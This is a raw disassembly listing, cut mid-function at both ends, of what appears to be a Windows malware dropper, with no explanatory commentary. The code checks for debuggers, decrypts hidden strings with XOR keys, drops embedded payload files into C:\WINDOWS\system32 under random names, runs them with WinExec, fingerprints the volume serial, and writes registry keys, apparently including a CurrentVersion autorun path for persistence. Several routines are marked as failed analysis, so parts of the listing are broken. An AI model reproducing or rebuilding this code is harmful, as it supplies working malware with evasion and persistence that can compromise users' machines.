movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_4034EB
loc_403516: ; CODE XREF: sub_403453+8E�j
lea edi, [ebp+var_14]
lea esi, aY@j? ; "y@j?"
mov ecx, 5
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_403453 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40352B proc near ; CODE XREF: sub_403BAD+98�p
; sub_403D6F+264�p ...
var_10B = byte ptr -10Bh
var_10A = dword ptr -10Ah
var_106 = word ptr -106h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
mov eax, dword_43C165
mov [ebp+var_10A], eax
lea edi, [ebp+var_10B]
lea esi, byte_43C169
xor ecx, ecx
inc ecx
rep movsb
call sub_40C1B8 ; RtlGetLastWin32Error
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call sub_403453
mov [ebp+var_106], 5B91h
sub [ebp+var_106], 7236h
push 2
push offset word_4464E2
call sub_4033BC
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C6D4
add esp, 18h
call sub_40C194 ; GetCurrentThreadId
lea eax, [ebp+var_104]
push eax
call sub_40C254 ; GlobalAddAtomA
pop edi
pop esi
leave
retn
sub_40352B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A9 proc near ; CODE XREF: sub_4096E4+2A7�p
; sub_4096E4+365�p ...
var_10A = dword ptr -10Ah
var_106 = word ptr -106h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
call sub_40C2B4 ; IsDebuggerPresent
mov eax, dword_43C16A
mov [ebp+var_10A], eax
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call sub_403453
mov edi, 0F8Fh
mov eax, edi
add eax, edi
mov edi, eax
push 2
push offset word_4464E2
call sub_4033BC
push eax
lea edx, [ebp+var_104]
push edx
call sub_40C6D4
add esp, 18h
call sub_40C1B8 ; RtlGetLastWin32Error
loc_403600: ; CODE XREF: sub_4035A9+9E�j
lea eax, [ebp+var_104]
push eax
call sub_40C26C ; GlobalFindAtomA
mov edx, eax
mov [ebp+var_106], dx
mov esi, 36CFh
add esi, 3758h
cmp [ebp+var_106], 0
jz short loc_403649
call sub_40C188 ; GetCurrentProcessId
movzx eax, [ebp+var_106]
push eax
call sub_40C260 ; GlobalDeleteAtom
mov ebx, 2ABDh
add ebx, 3B08h
jmp short loc_403600
; ---------------------------------------------------------------------------
loc_403649: ; CODE XREF: sub_4035A9+7F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4035A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40364E proc near ; CODE XREF: sub_4036DA+C1�p
; sub_4037D7+30�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C178
lea eax, ds:40E0D0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov [ebp+var_4], 360h
xor edi, edi
jmp short loc_403695
; ---------------------------------------------------------------------------
loc_40367B: ; CODE XREF: sub_40364E+49�j
mov eax, dword_43C178
add eax, edi
lea eax, ds:40E0D0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0CBh
mov [eax], dl
inc edi
loc_403695: ; CODE XREF: sub_40364E+2B�j
cmp edi, esi
jl short loc_40367B
mov eax, dword_43C178
add eax, esi
mov byte ptr ds:dword_40E0D0[eax], 0
mov edi, dword_43C178
add dword_43C178, 3
mov eax, dword_43C178
inc eax
add eax, esi
mov dword_43C178, eax
cmp eax, 0DFBh
jle short loc_4036D0
and dword_43C178, 0
loc_4036D0: ; CODE XREF: sub_40364E+79�j
lea eax, dword_40E0D0[edi]
pop edi
pop esi
leave
retn
sub_40364E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036DA proc near ; CODE XREF: sub_4037D7+3D�p
var_4B = byte ptr -4Bh
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
lea edi, [ebp+var_45]
lea esi, a4d_w ; "4D_w"
mov ecx, 5
rep movsb
lea edi, [ebp+var_46]
lea esi, byte_43C181
xor ecx, ecx
inc ecx
rep movsb
call sub_40C218 ; GetTickCount
mov eax, 11h
sub eax, dword_43C174
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40C620
add esp, 0Ch
mov [ebp+var_3C], 3288h
sub [ebp+var_3C], 7967h
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_403738: ; CODE XREF: sub_4036DA+63�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403738
mov edx, eax
mov [ebp+var_2], dl
mov [ebp+var_40], 48D8h
inc [ebp+var_40]
mov [ebp+var_1], 0
jmp short loc_40376A
; ---------------------------------------------------------------------------
loc_403754: ; CODE XREF: sub_4036DA+9A�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [ebx+edx], al
add [ebp+var_1], 1
loc_40376A: ; CODE XREF: sub_4036DA+78�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_403754
lea edi, [ebp+var_4B]
lea esi, aMrie ; "mrie"
mov ecx, 5
rep movsb
movzx eax, [ebp+var_2]
mov byte ptr [ebx+eax], 0
mov [ebp+var_3], 0
jmp short loc_4037AE
; ---------------------------------------------------------------------------
loc_403794: ; CODE XREF: sub_4036DA+E5�j
push 1
push offset byte_4464E0
call sub_40364E
push eax
push ebx
call sub_40C6D4
add esp, 10h
add [ebp+var_3], 1
loc_4037AE: ; CODE XREF: sub_4036DA+B8�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_403794
push [ebp+arg_8]
push ebx
call sub_40C6D4
add esp, 8
call sub_40C1F4 ; GetProcessHeap
pop edi
pop esi
pop ebx
leave
retn
sub_4036DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037D7 proc near ; CODE XREF: sub_40A4E2+618�p
var_3B = byte ptr -3Bh
var_38 = byte ptr -38h
var_33 = byte ptr -33h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push esi
push edi
mov [ebp+var_1], 0DEh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
lea edi, [ebp+var_38]
lea esi, aE0ls ; "E0LS"
mov ecx, 5
rep movsb
push 1
push (offset aBi_0+2)
call sub_40364E
push eax
lea edi, [ebp+var_33]
push edi
push [ebp+arg_0]
call sub_4036DA
add esp, 14h
lea edi, [ebp+var_3B]
lea esi, aR ; " r"
mov ecx, 3
rep movsb
lea eax, [ebp+var_33]
push eax
call sub_40C254 ; GlobalAddAtomA
call sub_40C218 ; GetTickCount
pop edi
pop esi
leave
retn
sub_4037D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40383E proc near ; CODE XREF: sub_4038D6+39�p
; .text:004039A6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C198
lea eax, ds:40F6F0h[eax]
push eax
call sub_40C674
add esp, 0Ch
mov [ebp+var_4], 2EBh
xor edi, edi
jmp short loc_403886
; ---------------------------------------------------------------------------
loc_40386C: ; CODE XREF: sub_40383E+4A�j
mov eax, dword_43C198
add eax, edi
lea eax, ds:40F6F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 82h
mov [eax], dl
inc edi
loc_403886: ; CODE XREF: sub_40383E+2C�j
cmp edi, esi
jl short loc_40386C
mov eax, dword_43C198
add eax, esi
mov byte ptr ds:dword_40F6F0[eax], 0
xor edi, edi
mov edi, dword_43C198
add dword_43C198, 2
mov eax, dword_43C198
add eax, 5
add eax, esi
mov dword_43C198, eax
cmp eax, 0E0Ah
jle short loc_4038C5
and dword_43C198, 0
loc_4038C5: ; CODE XREF: sub_40383E+7E�j
mov [ebp+var_8], 369h
lea eax, dword_40F6F0[edi]
pop edi
pop esi
leave
retn
sub_40383E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038D6 proc near ; CODE XREF: sub_40A4E2+696�p
; sub_40A4E2+6C2�p
var_109 = dword ptr -109h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
call sub_40C2B4 ; IsDebuggerPresent
mov [ebp+var_105], 0C6h
sub [ebp+var_105], 4Ah
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40C6B0
call sub_40C188 ; GetCurrentProcessId
push 1
push offset aBi_0 ; "¡›"
call sub_40383E
push eax
lea esi, [ebp+var_104]
push esi
call sub_40C6D4
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40C6D4
add esp, 20h
mov eax, dword_43C19C
mov [ebp+var_109], eax
lea eax, [ebp+var_104]
push eax
call sub_40C254 ; GlobalAddAtomA
mov edi, 776h
add edi, 1E4h
pop edi
pop esi
leave
retn
sub_4038D6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
mov word ptr [ebp-106h], 54FCh
add word ptr [ebp-106h], 285Eh
lea edi, [ebp-112h]
lea esi, aQetMvo ; "Qet<mvo"
movsd
movsd
call sub_40C1F4 ; GetProcessHeap
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40C6B0
mov ebx, 2D18h
inc ebx
push 1
push offset aBi_0 ; "¡›"
call sub_40383E
push eax
lea edi, [ebp-104h]
push edi
call sub_40C6D4
call sub_40C1F4 ; GetProcessHeap
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40C6D4
add esp, 20h
call sub_40C194 ; GetCurrentThreadId
loc_4039D4: ; CODE XREF: .text:00403A2A�j
lea eax, [ebp-104h]
push eax
call sub_40C26C ; GlobalFindAtomA
mov edi, eax
mov [ebp-108h], di
mov word ptr [ebp-10Ah], 2303h
add word ptr [ebp-10Ah], 7A0Ch
cmp word ptr [ebp-108h], 0
jz short loc_403A2C
call sub_40C1B8 ; RtlGetLastWin32Error
movzx eax, word ptr [ebp-108h]
push eax
call sub_40C260 ; GlobalDeleteAtom
lea edi, [ebp-115h]
lea esi, aDp ; "Dp"
mov ecx, 3
rep movsb
jmp short loc_4039D4
; ---------------------------------------------------------------------------
loc_403A2C: ; CODE XREF: .text:00403A03�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A31 proc near ; CODE XREF: sub_403AC7+8F�p
; sub_403BAD+73�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C1B4
lea eax, ds:41D930h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_403A6E
; ---------------------------------------------------------------------------
loc_403A57: ; CODE XREF: sub_403A31+3F�j
mov eax, dword_43C1B4
add eax, edi
lea eax, ds:41D930h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Eh
mov [eax], dl
inc edi
loc_403A6E: ; CODE XREF: sub_403A31+24�j
cmp edi, esi
jl short loc_403A57
mov [ebp+var_4], 391h
mov eax, dword_43C1B4
add eax, esi
mov byte ptr ds:dword_41D930[eax], 0
mov edi, dword_43C1B4
add dword_43C1B4, 2
mov eax, dword_43C1B4
lea eax, [eax+esi+1]
mov dword_43C1B4, eax
add dword_43C1B4, 3
cmp dword_43C1B4, 0DD8h
jle short loc_403ABD
and dword_43C1B4, 0
loc_403ABD: ; CODE XREF: sub_403A31+83�j
lea eax, dword_41D930[edi]
pop edi
pop esi
leave
retn
sub_403A31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AC7 proc near ; CODE XREF: sub_403BAD+39�p
; sub_403D6F+14D�p ...
var_100F = byte ptr -100Fh
var_100C = dword ptr -100Ch
var_1007 = byte ptr -1007h
var_1006 = word ptr -1006h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1010h
call sub_40C118
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C1B8 ; RtlGetLastWin32Error
mov [ebp+var_1006], 310Dh
add [ebp+var_1006], 5F44h
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C200 ; GetSystemDirectoryA
lea edi, [ebp+var_100F]
lea esi, word_4411DA
mov ecx, 3
rep movsb
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_100C]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C23C ; GetVolumeInformationA
push 4
push offset a6v ; "+>6V"
call sub_403A31
push [ebp+var_100C]
push eax
push ebx
call sub_40C6B0
add esp, 14h
mov [ebp+var_1007], 0A8h
movzx eax, [ebp+var_1007]
imul eax, 0F9Fh
mov [ebp+var_1007], al
and [ebp+var_4], 0
loc_403B89: ; CODE XREF: sub_403AC7+DF�j
mov eax, [ebp+var_4]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403B9F
cmp al, 30h
jle short loc_403B9F
mov eax, [ebp+var_4]
add eax, ebx
add byte ptr [eax], 11h
loc_403B9F: ; CODE XREF: sub_403AC7+CA�j
; sub_403AC7+CE�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403B89
pop edi
pop esi
pop ebx
leave
retn
sub_403AC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BAD proc near ; CODE XREF: sub_40A4E2+736�p
var_29B = byte ptr -29Bh
var_293 = byte ptr -293h
var_28B = byte ptr -28Bh
var_288 = byte ptr -288h
var_281 = byte ptr -281h
var_27B = byte ptr -27Bh
var_274 = byte ptr -274h
var_170 = byte ptr -170h
var_10C = word ptr -10Ch
var_109 = byte ptr -109h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 29Ch
push ebx
push esi
push edi
mov [ebp+var_103], 22h
sub [ebp+var_103], 0FAh
lea edi, [ebp+var_27B]
lea esi, aG8c5 ; "G8C: 5"
mov ecx, 7
rep movsb
call sub_40C194 ; GetCurrentThreadId
lea eax, [ebp+var_170]
push eax
call sub_403AC7
mov [ebp+var_104], 0C5h
movzx eax, [ebp+var_104]
imul eax, 301Ch
mov [ebp+var_104], al
lea edi, [ebp+var_281]
lea esi, aBpUp ; "BP~up"
mov ecx, 3
rep movsw
push 9
push offset aRKvk ; "+}R+} kvk"
call sub_403A31
lea edi, [ebp+var_170]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C6B0
lea eax, [ebp+var_FF]
push eax
call sub_40352B
call sub_40C188 ; GetCurrentProcessId
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40C2FC ; CreateFileA
mov [ebp+var_108], eax
mov [ebp+var_102], 1544h
movzx eax, [ebp+var_102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_102], ax
push 0
lea eax, [ebp+var_288]
push eax
push 3621h
push offset byte_43DBB9
push [ebp+var_108]
call sub_40C3B0 ; WriteFile
mov ebx, 16B7h
sub ebx, 611Eh
push [ebp+var_108]
call sub_40C1DC ; CloseHandle
mov [ebp+var_109], 1Ah
add [ebp+var_109], 3Fh
lea edi, [ebp+var_28B]
lea esi, aZs ; "zS"
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_274]
push eax
push 0
call sub_40C1C4 ; GetModuleFileNameA
lea edi, [ebp+var_293]
lea esi, byte_4411ED
mov ecx, 2
rep movsd
push 1
push offset a_ ; "."
call sub_403A31
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C6D4
lea edi, [ebp+var_29B]
lea esi, aJSovv ; "j# so‚V"
mov ecx, 2
rep movsd
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40C6D4
add esp, 38h
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40C3A4 ; WinExec
mov [ebp+var_10C], 23D3h
sub [ebp+var_10C], 17ECh
pop edi
pop esi
pop ebx
leave
retn
sub_403BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D6F proc near ; CODE XREF: sub_40A4E2+2ED�p
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F0 = byte ptr -2F0h
var_2EF = byte ptr -2EFh
var_2E9 = byte ptr -2E9h
var_2E2 = byte ptr -2E2h
var_2E1 = byte ptr -2E1h
var_2E0 = byte ptr -2E0h
var_274 = dword ptr -274h
var_270 = byte ptr -270h
var_20C = byte ptr -20Ch
var_20A = word ptr -20Ah
var_207 = byte ptr -207h
var_206 = byte ptr -206h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
push ebx
push esi
push edi
mov [ebp+var_20C], 0B9h
sub [ebp+var_20C], 0DBh
lea edi, [ebp+var_2E1]
lea esi, byte_4411FD
xor ecx, ecx
inc ecx
rep movsb
lea edi, [ebp+var_2E2]
lea esi, byte_4411FE
xor ecx, ecx
inc ecx
rep movsb
push 26h
push offset aUVVVVVVVVs ; "u+>:V+>:V#+>:V#+>:V#+>:V#+>:V+>:V+>:Vs"
call sub_403A31
mov [ebp+var_2F8], eax
call sub_40C698
mov [ebp+var_2FC], eax
call sub_40C698
mov [ebp+var_300], eax
call sub_40C698
mov [ebp+var_304], eax
call sub_40C698
mov [ebp+var_308], eax
call sub_40C698
mov [ebp+var_30C], eax
call sub_40C698
mov [ebp+var_310], eax
call sub_40C698
mov [ebp+var_314], eax
call sub_40C698
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_314]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_300]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2FC]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F8]
push edi
lea edi, [ebp+var_270]
push edi
call sub_40C6B0
lea edi, [ebp+var_2E9]
lea esi, aXf7 ; ";xF:7="
mov ecx, 7
rep movsb
lea eax, [ebp+var_2E0]
push eax
call sub_403AC7
add esp, 34h
lea edi, [ebp+var_2EF]
lea esi, aXvQu ; "x‚-QU"
mov ecx, 3
rep movsw
lea edi, [ebp+var_2F0]
lea esi, byte_44120C
xor ecx, ecx
inc ecx
rep movsb
call sub_40C698
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
mov [ebp+var_206], 0A0h
movzx eax, [ebp+var_206]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_206], al
mov [ebp+var_1], 1
jmp short loc_403F60
; ---------------------------------------------------------------------------
loc_403F30: ; CODE XREF: sub_403D6F+1F6�j
call sub_40C698
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403F60: ; CODE XREF: sub_403D6F+1BF�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403F30
mov [ebp+var_207], 2Fh
movzx eax, [ebp+var_207]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_207], al
mov [ebp+var_F9], 0
call sub_40C698
mov edx, eax
test dl, 1
jnz short loc_403FA7
call sub_40C218 ; GetTickCount
mov [ebp+var_FB], 33h
mov [ebp+var_FA], 32h
loc_403FA7: ; CODE XREF: sub_403D6F+223�j
push 9
push offset aRJbb ; "+}R+} jbb"
call sub_403A31
lea edi, [ebp+var_101]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_205]
push edi
call sub_40C6B0
lea eax, [ebp+var_205]
push eax
call sub_40352B
call sub_40C188 ; GetCurrentProcessId
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40C2FC ; CreateFileA
mov [ebp+var_274], eax
mov ebx, 2B3Ch
mov eax, ebx
add eax, ebx
mov ebx, eax
push [ebp+arg_0]
mov eax, offset aJfjbnm32 ; DATA XREF: .data:0043E149�w
; .data:0043E163�w ...
; "Jfjbnm32"
push eax
call sub_40C6B0 ; DATA XREF: .data:0043E232�w
mov [ebp+var_20A], 10D7h
sub_403D6F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404020 proc near ; DATA XREF: .data:0043E216�o
; .data:0043E22C�r ...
movzx eax, word ptr [ebp-20Ah]
mov edx, eax ; DATA XREF: .data:0043E220�r
add edx, eax
mov eax, edx ; DATA XREF: .data:loc_43E1B1�r
; .data:loc_43E1C1�r
mov [ebp-20Ah], ax ; DATA XREF: .data:0043E0B5�w
loc_404034: ; DATA XREF: .data:0043E0BF�w
; .data:0043E0DA�r ...
push 0
lea eax, [ebp-2F4h] ; DATA XREF: .data:0043E0C7�w
sub_404020 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40403C proc near ; DATA XREF: .data:0043E0D4�o
; .data:0043E0E2�o
push eax
push 1A01h
push offset dword_43C1B8
push dword ptr [ebp-274h]
call sub_40C3B0 ; WriteFile
call sub_40C224 ; GetVersion
push dword ptr [ebp-274h]
call sub_40C1DC ; CloseHandle
push 17h
push offset aMbGjrRgAmKXk ; "MB]GJR+}RG`^|am]k|xk|=<"
call sub_403A31
lea edi, [ebp-270h]
push edi
push eax
lea edi, [ebp-101h]
push edi
call sub_40C6B0
mov byte ptr [ebp-20Bh], 0E6h
movzx eax, byte ptr [ebp-20Bh] ; DATA XREF: .data:0043E064�w
loc_404090: ; DATA XREF: .data:0043E069�w
; .data:0043E085�w
mov edx, eax
add edx, eax
loc_404094: ; DATA XREF: .data:0043E5C4�w
; .data:0043E5CA�r ...
mov eax, edx
mov [ebp-20Bh], al ; DATA XREF: .data:0043F3AD�r
sub_40403C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40409C proc near ; DATA XREF: .data:0043E4EE�o
lea eax, [ebp-205h]
push eax
push offset byte_446481
lea eax, [ebp-101h] ; DATA XREF: sub_43E640+C�o
push eax
push 80000000h
call sub_404156
mov ebx, 5497h ; DATA XREF: sub_43E640+1C�o
mov eax, 26F3h
mul ebx
mov [ebp-318h], eax
mov ebx, eax
push 0Eh
push offset aZfKojgIcajkb ; "Zf|kojg`iCajkb"
call sub_403A31
mov [ebp-31Ch], eax
push 9
push offset aOOZckZ ; "O~o|zck`z"
call sub_403A31
push eax
mov edi, [ebp-31Ch]
push edi
lea edi, [ebp-101h]
push edi
push 80000000h
call sub_404156
mov byte ptr [ebp-275h], 35h
add byte ptr [ebp-275h], 4Ch
push 45h
push offset aAhzyoKrcgmAAhz ; "]ahzyo|kRCgm|a}ahzRYg`jay}RM{||k`zXk|}g"...
call sub_403A31
lea edi, [ebp-270h]
push edi
lea edi, [ebp-2E0h]
push edi
push eax
push 80000002h
call sub_404156
add esp, 80h
mov dword ptr [ebp-27Ch], 2043h
add dword ptr [ebp-27Ch], 714Ch
pop edi
pop esi
pop ebx
leave
retn
sub_40409C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404156 proc near ; CODE XREF: sub_40409C+18�p
; sub_40409C+63�p ...
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov ebx, [ebp+arg_C]
mov [ebp+var_5], 79h
movzx eax, [ebp+var_5]
imul eax, 6E73h
mov [ebp+var_5], al
inc dword_43B228
lea edi, [ebp+var_14]
lea esi, aJdh1c ; " Jdh1c"
mov ecx, 7
rep movsb
call sub_40C2B4 ; IsDebuggerPresent
and [ebp+var_4], 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C59C ; RegCreateKeyExA
call sub_40C194 ; GetCurrentThreadId
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4041BC: ; CODE XREF: sub_404156+6B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4041BC
mov [ebp+var_C], eax
push [ebp+var_C]
push ebx
push 1
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C5CC ; RegSetValueExA
mov ax, word_441214
mov [ebp+var_16], ax
push [ebp+var_4]
call sub_40C5A8 ; RegCloseKey
mov [ebp+var_D], 63h
movzx eax, [ebp+var_D]
imul eax, 77DBh
mov [ebp+var_D], al
pop edi
pop esi
pop ebx
leave
retn
sub_404156 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404201 proc near ; CODE XREF: sub_4042A4+C1�p
; sub_4042A4+E1�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441220
lea eax, ds:411C40h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_404242
; ---------------------------------------------------------------------------
loc_404228: ; CODE XREF: sub_404201+43�j
mov eax, dword_441220
add eax, edi
lea eax, ds:411C40h[eax]
movsx edx, byte ptr [eax]
xor edx, 0B3h
mov [eax], dl
inc edi
loc_404242: ; CODE XREF: sub_404201+25�j
cmp edi, esi
jl short loc_404228
mov [ebp+var_4], 1B4h
mov eax, dword_441220
add eax, esi
mov byte ptr ds:dword_411C40[eax], 0
xor edi, edi
mov edi, dword_441220
add dword_441220, 3
mov eax, dword_441220
lea eax, [eax+esi+2]
mov dword_441220, eax
add dword_441220, 3
cmp dword_441220, 0DE2h
jle short loc_404293
and dword_441220, 0
loc_404293: ; CODE XREF: sub_404201+89�j
mov [ebp+var_8], 1C5h
lea eax, dword_411C40[edi]
pop edi
pop esi
leave
retn
sub_404201 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042A4 proc near ; CODE XREF: sub_40A4E2+346�p
var_14A6 = byte ptr -14A6h
var_14A5 = byte ptr -14A5h
var_14A4 = word ptr -14A4h
var_14A2 = word ptr -14A2h
var_14A0 = byte ptr -14A0h
var_149C = dword ptr -149Ch
var_1498 = byte ptr -1498h
var_1494 = byte ptr -1494h
var_1395 = byte ptr -1395h
var_1394 = dword ptr -1394h
var_1390 = dword ptr -1390h
var_1380 = dword ptr -1380h
var_12FC = byte ptr -12FCh
var_11FD = byte ptr -11FDh
var_10FE = byte ptr -10FEh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14A8h
call sub_40C118
push ebx
push esi
push edi
lea edi, [ebp-1497h]
lea esi, byte_441224
mov ecx, 3
rep movsb
call sub_40C218 ; GetTickCount
push 0FFh
lea eax, [ebp+var_12FC]
push eax
push 0
call sub_40C1C4 ; GetModuleFileNameA
mov ebx, 0EE2h
mov eax, ebx
add eax, ebx
mov ebx, eax
mov [ebp+var_1390], 94h
lea eax, [ebp+var_1390]
push eax
